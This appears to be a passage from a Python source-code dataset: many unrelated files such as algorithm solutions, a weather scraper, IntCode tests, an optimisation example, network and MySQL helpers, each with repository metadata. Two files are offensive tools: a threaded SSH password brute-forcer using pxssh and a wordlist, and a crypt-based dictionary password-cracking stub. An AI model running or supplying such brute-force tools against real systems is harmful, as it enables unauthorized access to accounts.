# Calculate the numerator
numerator = (self.moments[0, 0] - self.moments[1, 1] + np.complex(0,
self.moments[0, 1] + self.moments[1, 0]))
# Calculate the denominator
if self._ellip_type == 'epsilon':
denominator = (self.r2 + 2 * np.sqrt(self.moments[0, 0] *
self.moments[1, 1] - self.moments[0, 1] *
self.moments[1, 0]))
else:
denominator = self.r2
# Calculate the ellipticity
ellip = numerator / denominator
self.e = np.array([ellip.real, ellip.imag])
| true |
717c20366a4a162e6d12b71785e340a45bd59078
|
Python
|
hemeshwarkonduru/leetcode-codes
|
/Add Two Numbers.py
|
UTF-8
| 1,156 | 3.359375 | 3 |
[] |
no_license
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
p1=l1
p2=l2
c=0
head=curr=ListNode(0) #just to assign likedlist head.next is returned at end
while (p1 or p2):
if(p1 is None):
v=p2.val+c
elif(p2 is None):
v=p1.val+c
else:
v=p1.val+p2.val+c
if(v>=10):
c=1
else:
c=0
curr.next=ListNode(v%10)
curr=curr.next
if(p1 is None):#when linkedlist1 ends but not ll2
p2=p2.next
elif(p2 is None):#when ll2 ends but not ll1
p1=p1.next
else:
p1=p1.next
p2=p2.next
if(p1 is None and p2 is None and c==1 ): #this condition is not to ignore carry at last
curr.next=ListNode(c)
return head.next
| true |
b2c5b08407e17810ccdfa0e1deb58302426a77d9
|
Python
|
zbaolong/an
|
/cx_tqsk.py
|
UTF-8
| 1,254 | 2.9375 | 3 |
[] |
no_license
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# 查询天气实况信息的模块。
__author__ = 'Andy'
import requests, os, sys
from bs4 import BeautifulSoup
# 用于解析URL页面:
def getSoup(url):
soup_url = url
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/51.0.2704.63 Safari/537.36'}
content = requests.get(soup_url, headers=headers)
soup = BeautifulSoup(content.text, 'html.parser')
return soup
# 获取天气实况:
def getWeather():
weather_url = "http://jnqx.jinan.gov.cn/jnszfqxj/front/zdz/list.do?type=1"
soup = getSoup(weather_url)
result = soup.find('div', align="center").find_all('td')
wlist = []
for w in result:
wlist.append(w.get_text())
#print wlist[18]
weather_msg = u'地点:'+wlist[16].strip().strip('\n').strip('\t').strip('\r')+u'\n时间:'+wlist[17]+u'\n温度:'+wlist[18].strip().strip('.')+u'℃'+u'\n湿度:'+wlist[19].strip()+u'%'+u'\n风向:'+wlist[20]+u'\n风速:'+wlist[21].strip()+u'm/s'+u'\n雨量:'+wlist[22].strip()+u'mm/h'+u'\n气压:'+wlist[23].strip()+u'hPa'+'\n'
#print weather_msg
return weather_msg
if __name__ == '__main__':
print getWeather()
| true |
91497b0b3d30e757eacc39d090e45d60c7487f60
|
Python
|
netsill/web-Safety
|
/python/pxssh破解.py
|
UTF-8
| 2,054 | 2.625 | 3 |
[] |
no_license
|
#coding=utf-8
import pxssh
import optparse
import time
import threading
MaxConnections = 5
ConnectLock = threading.BoundedSemaphore(value = MaxConnections)
Found = False
Fails = 0
def Connect(Host,User,Password,Release):
global Found,Fails
try:
Ssh = pxssh.pxssh()
Ssh.login(Host,User,Password)
print('[+]Password Found:'+Password)
Found = True
except Exception as e:
if'read_noneblocking' in str(e):
Fails += 1
time.sleep(5)
Connect(Host,User,Password,False)
elif'synchronize with original prompt' in str(e):
time.sleep(1)
Connect(Host,User,Password,False)
finally:
if Release:
ConnectLock.release()
def main():
parser = optparse.OptionParser('usage%prog '+'-H <target host> '
'-u <user> -f <password list>')
parser.add_option('-H', dest='TargetHost', type='string', help='specify target host')
parser.add_option('-f', dest='passwdFile', type='string',
help='specify password file')
parser.add_option('-u',dest='user',type='string',help = 'specify the user' )
(Options,args) = parser.parse_args()
Host = Options.TargetHost__
PasswordFile = Options.PasswordFile
User=Options.user
if Host == None or PasswordFile == None or User == None:
print(parser.usage)
exit(0)
Fn = open(PasswordFile,'r')
for Line in Fn.readlines():
if Found:
print("[*]Exiting : PasswordFound")
exit(0)
if Fails > 5:
print("[!]Exiting:Too Many Socket Timeouts")
exit(0)
ConnectLock.acquire()
Password = Line.strip('\r').strip('\n')
print("[-]Testing:"+str(Password))
t = threading.Thread(target = Connect,args=(Host,
User,Password,True))
t.start()
if __name__ == "__main__":
main()
| true |
71890b0a8a271c9fb6d035d116fea3236f7f5447
|
Python
|
Darainer/AdventOfCode2019
|
/IntCode_tests.py
|
UTF-8
| 3,946 | 2.625 | 3 |
[] |
no_license
|
import unittest
from IntCode import IntCode
from Day2_IntCode.Day2_1202_Program_Alarm import find_inputs_for_computeResult
from Day7_Amplification_Circuit.AmplificationConfig import CalculateMaxAmplification, FeedbackAmplification
class Day2_part1(unittest.TestCase):
def test_something(self):
input_program = 'Day2_IntCode/Real_program_codes.txt'
myIntcoder = IntCode(input_program)
myIntcoder.program_codes[1] = 12
myIntcoder.program_codes[2] = 2
myIntcoder.compute_program()
ret = myIntcoder.program_codes[0]
self.assertEqual(4138658, ret )
class Day2_part2(unittest.TestCase):
def test_something(self):
input_program = 'Day2_IntCode/Real_program_codes.txt'
myIntcoder = IntCode(input_program)
ret = find_inputs_for_computeResult(myIntcoder,0, 99, 19690720)
self.assertEqual(ret, 7264)
class Day5_part1(unittest.TestCase):
def test_something(self):
Input_day5 = 'Day5_Sunny_with_Asteroids/Day_5_input.txt'
Intcoder = IntCode(Input_day5)
Intcoder.run_Intcode_with_input(1)
ret = Intcoder.output
self.assertEqual(7988899,ret[-1])
class Day5_part2(unittest.TestCase):
def test_something(self):
Input_day5 = 'Day5_Sunny_with_Asteroids/Day_5_input.txt'
Intcoder = IntCode(Input_day5)
Intcoder.run_Intcode_with_input(5)
ret = Intcoder.output
self.assertEqual(13758663, ret[-1])
class Day7_part1(unittest.TestCase):
def test_something(self):
phase_codes = [0, 1, 2, 3, 4]
input_program = 'Day7_Amplification_Circuit/Day7_AMP_input_program.txt'
Max_Thruster_output = CalculateMaxAmplification(input_program, phase_codes)
print('Max_Thruster_output', Max_Thruster_output)
self.assertEqual(225056, Max_Thruster_output)
class Day7Partb_Complete_program(unittest.TestCase):
def test_something(self):
phase_codes = [5, 6, 7, 8, 9]
input_program = 'Day7_Amplification_Circuit/Day7_AMP_input_program.txt'
Max_Thruster_output = FeedbackAmplification(input_program, phase_codes)
print('Max_Thruster_output', Max_Thruster_output)
self.assertEqual(14260332, Max_Thruster_output)
class Day9_part1testcase(unittest.TestCase):
def test_something(self):
input_program = [109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99]
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output([])
self.assertEqual(input_program, program_output)
class Day9_part1testcase2(unittest.TestCase):
def test_something(self):
input_program = [1102,34915192,34915192,7,4,7,99,0]
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output([])
self.assertEqual(len(str(abs(program_output[0]))),16)
class Day9_part1testcase3(unittest.TestCase):
def test_something(self):
input_program = [104,1125899906842624,99]
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output([])
self.assertEqual(1125899906842624,program_output[0])
class Day9_part1(unittest.TestCase):
def test_something(self):
input_program = 'Day_9_Sensor_Boost/Day9_input.txt'
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output(1)
print('Boost Keycode', program_output)
self.assertEqual(int, type(program_output[0]))
class Day9_part2(unittest.TestCase):
def test_something(self):
input_program = 'Day_9_Sensor_Boost/Day9_input.txt'
myIntCoder = IntCode(input_program)
program_output = myIntCoder.run_Intcode_with_input_output(2)
print('coordinates of the distress signal', program_output)
self.assertEqual(int, type(program_output[0]))
if __name__ == '__main__':
unittest.main()
| true |
bf9361ac4af0f24c8ea28328a829911d05777963
|
Python
|
joojaeyoon/PS
|
/BOJ/3000-4000/3078/3078.py
|
UTF-8
| 324 | 2.75 | 3 |
[] |
no_license
|
import sys
from collections import deque
N, K = map(int, input().split())
answer = 0
q = [deque([]) for _ in range(21)]
for i in range(N):
length = len(sys.stdin.readline())-1
while q[length] and i-q[length][0] > K:
q[length].popleft()
answer += len(q[length])
q[length].append(i)
print(answer)
| true |
bf1ba1d77c5526d50d8fb0ca12158416ffb30753
|
Python
|
upgradeb/ViolentPython
|
/Chapter01/pwdCrack.py
|
UTF-8
| 840 | 2.875 | 3 |
[] |
no_license
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import crypt
import hashlib
import sys
def EnCrypt(word, salt):
cryptWord = crypt.crypt(word, salt)
print(cryptWord)
return cryptWord
def testPass(cryptPass):
salt = cryptPass[0:2]
dictFile = open('key.txt', 'r')
for word in dictFile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt)
# print(cryptWord)
def main():
passFile = open('password.txt')
for line in passFile.readlines():
if ":" in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ')
print("[*] Cracking Password For: " + user + "\n")
testPass(cryptPass)
if __name__ == "__main__":
# main()
EnCrypt('toor', '$6$SZESLPWZ')
# EnSha512('toor', '$6$ZESLPWZ$')
| true |
eb7696cef736b34b6440462fcac3cc7c4ab2e133
|
Python
|
srikanthpragada/25_FEB_2019_PYTHONDEMO
|
/oop/sum_of_nums.py
|
UTF-8
| 149 | 4.09375 | 4 |
[] |
no_license
|
sum = 0
for i in range(1, 6):
try:
num = int(input("Enter number :"))
sum += num
except:
pass
print(f"Sum = {sum}")
| true |
84eeecab695d7301ed1437208981589a3b6162f9
|
Python
|
scikit-optimize/scikit-optimize.github.io
|
/0.7/_downloads/2f6e22007265fe3158cce44853e94a58/strategy-comparison.py
|
UTF-8
| 4,632 | 3.40625 | 3 |
[] |
permissive
|
"""
==========================
Comparing surrogate models
==========================
Tim Head, July 2016.
Reformatted by Holger Nahrstaedt 2020
.. currentmodule:: skopt
Bayesian optimization or sequential model-based optimization uses a surrogate
model to model the expensive to evaluate function `func`. There are several
choices for what kind of surrogate model to use. This notebook compares the
performance of:
* gaussian processes,
* extra trees, and
* random forests
as surrogate models. A purely random optimization strategy is also used as
a baseline.
"""
print(__doc__)
import numpy as np
np.random.seed(123)
import matplotlib.pyplot as plt
#############################################################################
# Toy model
# =========
#
# We will use the :class:`benchmarks.branin` function as toy model for the expensive function.
# In a real world application this function would be unknown and expensive
# to evaluate.
from skopt.benchmarks import branin as _branin
def branin(x, noise_level=0.):
return _branin(x) + noise_level * np.random.randn()
#############################################################################
from matplotlib.colors import LogNorm
def plot_branin():
fig, ax = plt.subplots()
x1_values = np.linspace(-5, 10, 100)
x2_values = np.linspace(0, 15, 100)
x_ax, y_ax = np.meshgrid(x1_values, x2_values)
vals = np.c_[x_ax.ravel(), y_ax.ravel()]
fx = np.reshape([branin(val) for val in vals], (100, 100))
cm = ax.pcolormesh(x_ax, y_ax, fx,
norm=LogNorm(vmin=fx.min(),
vmax=fx.max()))
minima = np.array([[-np.pi, 12.275], [+np.pi, 2.275], [9.42478, 2.475]])
ax.plot(minima[:, 0], minima[:, 1], "r.", markersize=14,
lw=0, label="Minima")
cb = fig.colorbar(cm)
cb.set_label("f(x)")
ax.legend(loc="best", numpoints=1)
ax.set_xlabel("X1")
ax.set_xlim([-5, 10])
ax.set_ylabel("X2")
ax.set_ylim([0, 15])
plot_branin()
#############################################################################
# This shows the value of the two-dimensional branin function and
# the three minima.
#
#
# Objective
# =========
#
# The objective of this example is to find one of these minima in as
# few iterations as possible. One iteration is defined as one call
# to the :class:`benchmarks.branin` function.
#
# We will evaluate each model several times using a different seed for the
# random number generator. Then compare the average performance of these
# models. This makes the comparison more robust against models that get
# "lucky".
from functools import partial
from skopt import gp_minimize, forest_minimize, dummy_minimize
func = partial(branin, noise_level=2.0)
bounds = [(-5.0, 10.0), (0.0, 15.0)]
n_calls = 60
#############################################################################
def run(minimizer, n_iter=5):
return [minimizer(func, bounds, n_calls=n_calls, random_state=n)
for n in range(n_iter)]
# Random search
dummy_res = run(dummy_minimize)
# Gaussian processes
gp_res = run(gp_minimize)
# Random forest
rf_res = run(partial(forest_minimize, base_estimator="RF"))
# Extra trees
et_res = run(partial(forest_minimize, base_estimator="ET"))
#############################################################################
# Note that this can take a few minutes.
from skopt.plots import plot_convergence
plot = plot_convergence(("dummy_minimize", dummy_res),
("gp_minimize", gp_res),
("forest_minimize('rf')", rf_res),
("forest_minimize('et)", et_res),
true_minimum=0.397887, yscale="log")
plot.legend(loc="best", prop={'size': 6}, numpoints=1)
#############################################################################
# This plot shows the value of the minimum found (y axis) as a function
# of the number of iterations performed so far (x axis). The dashed red line
# indicates the true value of the minimum of the :class:`benchmarks.branin` function.
#
# For the first ten iterations all methods perform equally well as they all
# start by creating ten random samples before fitting their respective model
# for the first time. After iteration ten the next point at which
# to evaluate :class:`benchmarks.branin` is guided by the model, which is where differences
# start to appear.
#
# Each minimizer only has access to noisy observations of the objective
# function, so as time passes (more iterations) it will start observing
# values that are below the true value simply because they are fluctuations.
| true |
0660a760a158a0aefde75aa79c9aab969d9238ab
|
Python
|
Tchekda/IVAOWrapper
|
/ivao/pilot.py
|
UTF-8
| 5,549 | 2.53125 | 3 |
[
"MIT"
] |
permissive
|
from .client import Client
class Pilot(Client):
def __init__(self, callsign, vid, latitude, longitude, altitude, server, connection_time, soft_name, soft_version,
admin_rating, client_rating, groundspeed, aircraft, cruise_speed, departure_airport, cruise_level,
destination_airport, transponder, flight_rule, departure_time, actual_departure_time,
alternate_airport, fpl_remark, route, flight_type, passengers, heading, ground, simulator):
"""
Create a Pilot Object from string parsed in the Whazzup file, so all data is considered as a string
:param callsign: Callsign of the controller (LFBD_TWR)
:param vid: Client's VID (485573)
:param latitude: Latitude of the center of the control zone
:param longitude: Longitude of the center of the control zone
:param altitude: Altitude of ther center of the control zone
:param server: Server to which the client is connected (EU7)
:param connection_time: Date and time, the client connected to the server
:param soft_name: Name of the software used by the client
:param soft_version: Version of the software used by the client
:param admin_rating: Administrative rating
:param client_rating: Pilot rank
:param groundspeed: The groundspeed of the pilot.
:param aircraft: According to ICAO flightplan specifications. (1/C172/L-CS/C)
:param cruise_speed: According to ICAO flightplan specifications.
:param departure_airport: According to ICAO flightplan specifications.
:param cruise_level: According to ICAO flightplan specifications.
:param destination_airport: According to ICAO flightplan specifications.
:param transponder: The transponder code set by the pilot.
:param flight_rule: According to ICAO flightplan specifications.
:param departure_time: According to ICAO flightplan specifications.
:param actual_departure_time: The actual departure time.
:param alternate_airport: According to ICAO flightplan specifications.
:param fpl_remark: According to ICAO flightplan specifications.
:param route: According to ICAO flightplan specifications.
:param flight_type: According to ICAO flightplan specifications.
:param passengers: According to ICAO flightplan specifications.
:param heading: The heading of the plane.
:param ground: A flag indicating if the plane is on ground or not.
:param simulator: The simulator used by the pilot.
"""
super().__init__(callsign=callsign, vid=vid, client_type="PILOT", latitude=latitude, longitude=longitude,
altitude=altitude, server=server, connection_time=connection_time,
soft_name=soft_name, soft_version=soft_version, admin_rating=admin_rating,
client_rating=client_rating)
self.destination_airport = destination_airport
self.simulator = int(simulator)
if ground == "1":
self.ground = True
else:
self.ground = False
self.heading = int(heading)
if passengers != '':
self.passengers = int(passengers)
else:
self.passengers = 0
self.flight_type = flight_type
if groundspeed != '':
self.groundspeed = int(groundspeed)
else:
self.groundspeed = 0
self.aircraft = aircraft
self.cruise_speed = cruise_speed
self.atis = departure_airport
self.atis_time = cruise_level
self.transponder = int(transponder)
self.flight_rule = flight_rule
self.departure_time = departure_time
self.actual_departure_time = actual_departure_time
self.alternate_airport = alternate_airport
self.fpl_remark = fpl_remark
self.route = route
def get_simulator_name(self):
"""
Get the name of the simulator used by the pilot
:return: str
"""
return {
0: "Unknown",
1: "Microsoft Flight Simulator 95",
2: "Microsoft Flight Simulator 98",
3: "Microsoft Combat Flight Simulator",
4: "Microsoft Flight Simulator 2000",
5: "Microsoft Combat Flight Simulator 2",
6: "Microsoft Flight Simulator 2002",
7: "Microsoft Combat Flight Simulator 3",
8: "Microsoft Flight Simulator 2004",
9: "Microsoft Flight Simulator X",
11: "X-Plane",
12: "X-Plane 8",
13: "X-Plane 9",
14: "X-Plane 10",
15: "PS1",
16: "X-Plane 11",
17: "X-Plane 12", # Really???
20: "Fly!",
21: "Fly! 2",
25: "Prepar3D",
30: "Prepar3D 1.x"
}.get(self.simulator, 'Unknown')
def get_client_rating_name(self):
"""
Get the name of the pilot rank on the network
:return: str
"""
return {
1: "Observer",
2: "Basic Flight Student (FS1)",
3: "Flight Student (FS2)",
4: "Advanced Flight Student (FS3)",
5: "Private Pilot (PP)",
6: "Senior Private Pilot (SPP)",
7: "Commercial Pilot (CP)",
8: "Airline Transport Pilot (ATP)",
9: "Senior Flight Instructor (SFI)",
10: "Chief Flight Instructor (CFI)"
}.get(self.client_rating, None)
| true |
99a4c1c90c76e8c353a5ccb5c0abba75e78b17e4
|
Python
|
bchretien/PyUDT
|
/legacy/example/pyudt/epoll/server.py
|
UTF-8
| 4,097 | 2.578125 | 3 |
[] |
no_license
|
#!/usr/bin/env python
"""
:module udtserver
"""
import struct
import udt4 as udt
from udt4 import pyudt
import socket as socklib
from subprocess import Popen
import sys
def configure_epoll(udt_clients, sys_clients):
epoll = pyudt.Epoll()
for client in udt_clients:
epoll.add_usock(client, udt.UDT_EPOLL_IN)
for client in sys_clients:
epoll.add_ssock(client, udt.UDT_EPOLL_IN)
return epoll
def clean_epoll(epoll, udt_clients, sys_clients):
for client in udt_clients:
epoll.remove_usock(client, udt.UDT_EPOLL_IN)
for client in sys_clients:
epoll.remove_ssock(client, udt.UDT_EPOLL_IN)
def acquire_udt_clients(serv_addr, serv_port, count):
print('Acquiring UDT clients')
udt_serv = pyudt.UdtSocket()
udt_serv.bind( (serv_addr, serv_port) )
udt_serv.listen(100)
clients = []
for i in xrange(count):
Popen('./client.py %(host)s %(protocol)s %(port)i ' % {
'host' : serv_addr, 'port' : serv_port, 'protocol' : 'udt' },
shell = True
)
socket, client_addr = udt_serv.accept()
clients.append(socket)
return udt_serv, clients
def acquire_tcp_clients(serv_addr, serv_port, count):
print('Acquiring TCP clients')
tcp_serv = socklib.socket()
tcp_serv.bind( (serv_addr, serv_port) )
tcp_serv.listen(100)
clients = []
for i in xrange(count):
Popen('./client.py %(host)s %(protocol)s %(port)i ' % {
'host' : serv_addr, 'port' : serv_port, 'protocol' : 'tcp' },
shell = True
)
socket, client_addr = tcp_serv.accept()
clients.append(socket)
return tcp_serv, clients
def handle_socket_uset(epoll, sock_set):
"""
Ideally this function should work for both UdtSocket type and socket.socket
type.
standard:
4 byte - version
8 byte - length
k byte - message
"""
for sock in sock_set:
integer = sock.recv(4)
if integer:
try:
version = struct.unpack('i', integer)
msg_len = struct.unpack('l', sock.recv(8))[0]
msg = sock.recv(msg_len)
except:
sys.stderr.write('UDT socket closed')
epoll.remove_usock(sock)
continue
else:
print('UDT message: ' + msg)
def handle_socket_sset(epoll, sock_set):
"""
Ideally this function should work for both UdtSocket type and socket.socket
type.
standard:
4 byte - version
8 byte - length
k byte - message
"""
for sock in sock_set:
integer = sock.recv(4)
if integer:
try:
version = struct.unpack('i', integer)
msg_len = struct.unpack('l', sock.recv(8))[0]
msg = sock.recv(msg_len)
except:
sys.stderr.write('TCP socket closed')
epoll.remove_ssock(sock)
continue
else:
print('TCP message: ' + msg)
def main():
"""
"""
udt.startup()
udt_serv, udt_clients = acquire_udt_clients('127.0.0.1', 4001, 3)
tcp_serv, tcp_clients = acquire_tcp_clients('127.0.0.1', 4002, 3)
print('Configuring epoll')
epoll = configure_epoll(udt_clients, tcp_clients)
print('Reading messages')
i = 0
while True:
sets = epoll.wait(True, False, 10000, True, False)
handle_socket_uset(epoll, sets[0])
handle_socket_uset(epoll, sets[1])
handle_socket_sset(epoll, sets[2])
handle_socket_sset(epoll, sets[3])
if len(sets[0]) == 0:
i += 1
if i == 12:
print('... done!')
break
print('Cleaning epoll')
clean_epoll(epoll, udt_clients, tcp_clients)
print('Closing sockets')
for client in udt_clients:
client.close()
for client in tcp_clients:
client.close()
udt_serv.close()
tcp_serv.close()
udt.cleanup()
if __name__ == '__main__':
from sys import exit
exit(main())
| true |
d8ff438375b4bdd79ecfba103c5f65afd2bcb714
|
Python
|
MengSunS/daily-leetcode
|
/fb高频/211.py
|
UTF-8
| 1,207 | 3.734375 | 4 |
[] |
no_license
|
class TrieNode():
def __init__(self):
self.children = collections.defaultdict(TrieNode)
self.isWord = False
class WordDictionary:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TrieNode()
def addWord(self, word: str) -> None:
node = self.root
for ch in word:
node = node.children[ch]
node.isWord = True
def search(self, word: str) -> bool:
node = self.root
return self.dfs(node, 0, word)
def dfs(self, node, i, word):
if i == len(word):
if node.isWord:
return True
return False
if word[i] == '.':
for n in node.children.values():
if self.dfs(n, i + 1, word):
return True
else:
node = node.children.get(word[i])
if not node:
return False
return self.dfs(node, i + 1, word)
# Your WordDictionary object will be instantiated and called as such:
# obj = WordDictionary()
# obj.addWord(word)
# param_2 = obj.search(word)
| true |
b19ccfc2ae58230bad4a2218cf0890e0023681af
|
Python
|
IgorxutStepikOrg/AlgorithmsTheoryAndPracticeMethods
|
/Module8_2/Step 6/python/solution.py
|
UTF-8
| 973 | 2.96875 | 3 |
[] |
no_license
|
def func(len, list):
P = [0] * len
M = [0] * (len + 1)
L = 0
list = list[:: -1]
for i in range(len):
lo = 1
hi = L
while lo <= hi:
mid = (lo + hi) // 2
if list[M[mid]] < list[i]:
lo = mid + 1
elif list[M[mid]] == list[i]:
lo += 1
else:
hi = mid - 1
newL = lo
P[i] = M[newL - 1]
if newL > L:
M[newL] = i
L = newL
elif list[i] < list[M[newL]]:
M[newL] = i
# восстановление решения
result = [0] * L
k = M[L]
for i in range(L - 1, -1, -1):
result[i] = len - k
k = P[k]
return result
def main():
n = int(input())
A = [int(i) for i in input().split()]
result = func(n, A)
print("{0}\n{1}".format(len(result), " ".join(map(str, result[::-1]))))
if __name__ == "__main__":
main()
| true |
e53df48b9eec7de6de631439daca0dd07219d51f
|
Python
|
Aasthaengg/IBMdataset
|
/Python_codes/p03796/s181516620.py
|
UTF-8
| 84 | 2.65625 | 3 |
[] |
no_license
|
import math
N = int(input())
N = math.factorial(N)
N = (N % (1000000000+7))
print(N)
| true |
7a4474272ecae5659cdc018cd2331f9908463903
|
Python
|
FoFxjc/ChangXing-Tool
|
/utils/mysql.py
|
UTF-8
| 10,778 | 3 | 3 |
[] |
no_license
|
# coding=utf-8
"""
爬虫工具-基础工具包:MySQL数据库支持函数
"""
import re
import mysql.connector
def select_by_sql(host: str, user: str, password: str, database: str, sql: str, columns: list,
use_unicode: bool = True):
"""
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> 需要读取的MySQL数据库名称
:param sql: <str> 读取数据的SQL语句
:param columns: <str> 需要读取的字段名称
:param use_unicode: <bool> 是否设置MySQL数据库链接时的use_unicode参数,默认为True
:return: <list> 读取的数据结果
"""
mysql_database = mysql.connector.connect(host=host, user=user, password=password, database=database,
use_unicode=use_unicode) # 链接到MySQL数据库
mysql_cursor = mysql_database.cursor() # 获取数据库操作句柄
mysql_cursor.execute(sql) # 生成并执行SELECT语句
mysql_results = mysql_cursor.fetchall() # 获取SQL语句执行的返回多行记录的结果
select_result = []
for mysql_result in mysql_results: # 遍历:SQL语句检索的各行记录
if len(columns) > 1: # 处理读取字段数超过1个的情况
select_item = []
for i in range(len(columns)):
select_item.append(mysql_result[i])
select_result.append(select_item)
elif len(columns) == 1: # 处理读取字段数为1个的情况
select_result.append(mysql_result[0])
mysql_database.shutdown()
return select_result
def select(host: str, user: str, password: str, database: str, table: str, columns: list,
use_unicode: bool = True, sql_where: str = ""):
""" SELECT读取MySQL数据库的数据
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> 需要读取的MySQL数据库名称
:param table: <str> 需要读取的MySQL数据表名称
:param columns: <list:str> 需要读取的字段名称列表
:param use_unicode: <bool> 是否设置MySQL数据库链接时的use_unicode参数,默认为True
:param sql_where: <str> 在执行SELECT语句时是否添加WHERE子句(默认为空,如添加应以WHERE开头)
:return: <list> 读取的数据结果
"""
mysql_database = mysql.connector.connect(host=host, user=user, password=password, database=database,
use_unicode=use_unicode) # 链接到MySQL数据库
mysql_cursor = mysql_database.cursor() # 获取数据库操作句柄
mysql_cursor.execute(sql_select(table, columns, sql_where)) # 生成并执行SELECT语句
mysql_results = mysql_cursor.fetchall() # 获取SQL语句执行的返回多行记录的结果
select_result = []
for mysql_result in mysql_results: # 遍历:SQL语句检索的各行记录
if len(columns) > 1: # 处理读取字段数超过1个的情况
select_item = []
for i in range(len(columns)):
select_item.append(mysql_result[i])
select_result.append(select_item)
elif len(columns) == 1: # 处理读取字段数为1个的情况
select_result.append(mysql_result[0])
mysql_database.shutdown()
return select_result
def create(host: str, user: str, password: str, sql: str):
""" CREATE创建数据表到MySQL数据库
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param sql: <str> 创建数据表的SQL语句
"""
mysql_database = mysql.connector.connect(host=host, user=user, password=password) # 链接到MySQL数据库
mysql_cursor = mysql_database.cursor()
mysql_cursor.execute(sql)
return True
def execute(host: str, user: str, password: str, database: str, sql: str):
""" 执行SQL语句
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> MYSQL数据库的名称
:param sql: <str> 创建数据表的SQL语句
:return:
"""
mysql_database = mysql.connector.connect(host=host, user=user, password=password, database=database)
mysql_cursor = mysql_database.cursor()
mysql_cursor.execute(sql) # 执行SQL语句
mysql_database.commit() # 数据表内容更新提交语句
return mysql_cursor.rowcount
def insert(host: str, user: str, password: str, database: str, table: str, data: list, use_unicode: bool = True):
""" INSERT写入数据到MySQL数据库
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> 需要写入的MySQL数据库名称
:param table: <str> 需要写入的MySQL数据表名称
:param data: <list:list> 需要写入的多条记录(所有记录的字段名与第一条记录的字段名统一)
:param use_unicode: <bool> 是否设置MySQL数据库链接时的use_unicode参数,默认为True
:return: <bool> 写入数据是否成功
"""
if len(data) == 0: # 处理需要写入的记录数为0的情况
return 0
mysql_database = mysql.connector.connect(
host=host, user=user, password=password, database=database, use_unicode=use_unicode) # 链接到MySQL数据库
mysql_cursor = mysql_database.cursor()
sql, val = sql_insert(table, data)
mysql_cursor.executemany(sql, val) # 执行SQL语句
mysql_database.commit() # 数据表内容更新提交语句
return mysql_cursor.rowcount
def insert_pure(host: str, user: str, password: str, database: str, table: str, data: list, use_unicode: bool = True):
""" INSERT写入数据到MySQL数据库(使用纯粹SQL语句)
:param host: <str> MySQL数据库主机的Url
:param user: <str> MySQL数据库的访问用户名
:param password: <str> MySQL数据库的访问密码
:param database: <str> 需要写入的MySQL数据库名称
:param table: <str> 需要写入的MySQL数据表名称
:param data: <list:list> 需要写入的多条记录(所有记录的字段名与第一条记录的字段名统一)
:param use_unicode: <bool> 是否设置MySQL数据库链接时的use_unicode参数,默认为True
:return: <bool> 写入数据是否成功
"""
if len(data) == 0: # 处理需要写入的记录数为0的情况
return 0
mysql_database = mysql.connector.connect(
host=host, user=user, password=password, database=database, use_unicode=use_unicode) # 链接到MySQL数据库
mysql_cursor = mysql_database.cursor()
sql = sql_insert_pure(table, data)
# print(sql)
mysql_cursor.execute(sql) # 执行SQL语句
mysql_database.commit() # 数据表内容更新提交语句
return mysql_cursor.rowcount
def sql_select(table: str, columns: list, where: str = ""):
""" [生成SQL语句]SELECT语句
:param table: <str> 需要SELECT的表单名称
:param columns: <list:str> 需要读取的字段名称列表
:param where: <str> 在SELECT时执行的WHERE子句(默认为空,如添加应以WHERE开头)
:return: <str> 生成完成的SELECT(MySQL)语句
"""
sql = "SELECT "
for column in columns:
sql += column + ","
return re.sub(",$", " FROM " + table + " " + where, sql)
def sql_insert(table: str, data: list):
""" [生成SQL语句]INSERT语句
:param table: <str> 需要写入的MySQL数据表名称
:param data: <list:list> 需要写入的多条记录(所有记录的字段名与第一条记录的字段名统一)
:return: <str> SQL语句部分, <list> 写入数据部分 / <None> 需要写入的数据存在问题
"""
if len(data) == 0:
return None
# 生成SQL语句
column_list = []
column_part = "" # SQL语句列名部分
value_part = "" # SQL语句数据部分
for column in data[0]:
column_list.append([column, type(data[0][column])])
column_part += "`" + column + "`,"
if isinstance(data[0][column], str):
value_part += "%s,"
elif isinstance(data[0][column], int) or isinstance(data[0][column], float):
value_part += "%d,"
else:
value_part += "%s,"
column_part = re.sub(",$", "", column_part)
value_part = re.sub(",$", "", value_part)
sql = "INSERT INTO " + table + " (" + column_part + ") VALUES (" + value_part + ")" # 拼接SQL语句
# 生成写入数据
val = []
for data in data:
val_item = []
for column in column_list:
if column[0] in data and (column[1] == int or column[1] == float or column[1] == str):
val_item.append(data[column[0]])
else:
if column[1] == int or column[1] == float:
val_item.append(0)
else:
val_item.append("")
val.append(val_item)
return sql, val
def sql_insert_pure(table: str, data: list):
""" [生成SQL语句]INSERT语句(纯粹SQL语句,部分sql和val)
:param table: <str> 需要写入的MySQL数据表名称
:param data: <list:list> 需要写入的多条记录(所有记录的字段名与第一条记录的字段名统一)
:return: <str> SQL语句部分
"""
if len(data) == 0:
return None
# 生成SQL语句
column_list = []
column_part = "" # SQL语句列名部分
for column in data[0]:
column_list.append([column, type(data[0][column])])
